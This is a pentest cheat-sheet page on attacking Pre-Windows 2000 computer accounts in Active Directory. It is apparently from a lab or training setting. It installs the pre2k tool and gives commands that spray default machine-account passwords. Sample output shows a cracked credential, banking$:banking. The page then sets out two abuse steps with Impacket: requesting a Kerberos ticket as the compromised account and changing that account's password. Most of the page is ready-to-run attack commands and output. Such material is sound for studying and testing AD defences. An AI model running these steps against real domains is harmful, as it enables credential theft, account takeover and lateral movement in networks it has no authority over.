TLDRBins TLDRBins / Pre-Windows 2000 Computer

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Enum

Installation

python3 -m venv venv

Sample Output:
TO-DO
source venv/bin/activate

Sample Output:
TO-DO
git clone https://github.com/garrettfoster13/pre2k.git

Sample Output:
TO-DO
cd pre2k/

Sample Output:
TO-DO
pip3 install .

Sample Output:
TO-DO

Query

# Unauth
pre2k unauth -d '<DOMAIN>' -dc-ip '<DC_IP>' -verbose -inputfile '<MACHINES_FILE>'

Sample Output:
$ cat machines.txt 
banking$

$ pre2k unauth -d example.com -dc-ip 192.168.1.10 -verbose -inputfile 'machines.txt'

                                ___    __         
                              /'___`\ /\ \        
 _____   _ __    __          /\_\ /\ \\ \ \/'\    
/\ '__`\/\`'__\/'__`\ _______\/_/// /__\ \ , <    
\ \ \L\ \ \ \//\  __//\______\  // /_\ \\ \ \\`\  
 \ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
  \ \ \/  \/_/ \/____/         \/_____/   \/_/\/_/
   \ \_\                                      v3.1    
    \/_/                                          
                                            @unsigned_sh0rt
                                            @Tw1sm          

[23:53:03] INFO     Testing started at 2025-07-10 23:53:03
[23:53:03] INFO     Using 10 threads
[23:53:03] INFO     VALID CREDENTIALS: example.com\banking$:banking

# Auth
pre2k auth -u '<USER>' -p '<PASSWORD>' -d '<DOMAIN>' -dc-ip '<DC_IP>' -verbose

Sample Output:
$ pre2k auth -u trainee -p trainee -d example.com -dc-ip 192.168.1.10 -verbose                             

                                ___    __         
                              /'___`\ /\ \        
 _____   _ __    __          /\_\ /\ \\ \ \/'\    
/\ '__`\/\`'__\/'__`\ _______\/_/// /__\ \ , <    
\ \ \L\ \ \ \//\  __//\______\  // /_\ \\ \ \\`\  
 \ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
  \ \ \/  \/_/ \/____/         \/_____/   \/_/\/_/
   \ \_\                                      v3.1    
    \/_/                                          
                                            @unsigned_sh0rt
                                            @Tw1sm          

[23:54:06] INFO     Retrieved 2 results total.
[23:54:06] INFO     Testing started at 2025-07-10 23:54:06
[23:54:06] INFO     Using 10 threads
[23:54:07] INFO     VALID CREDENTIALS: example.com\BANKING$:banking
[23:54:07] DEBUG    Invalid credentials: example.com\DC$:dc

Ref: pre2k

Abuse #1: Connect via Kerberos

1. Request a Ticket

sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>

Sample Output:
$ sudo ntpdate -s dc.example.com && impacket-getTGT 'example.com/Banking$:banking' -dc-ip dc.example.com     
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Banking$.ccache

export KRB5CCNAME='<USER>.ccache'

Sample Output:
TO-DO

Abuse #2: Change Target Password

impacket-changepasswd -newpass <NEW_PASSWORD> '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -protocol rpc-samr

Sample Output:
$ impacket-changepasswd -newpass banking 'example.com/BANKING$:banking@dc.example.com' -protocol rpc-samr 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Changing the password of example.com\BANKING$
[*] Connecting to DCE/RPC as example.com\BANKING$
[*] Password was changed successfully.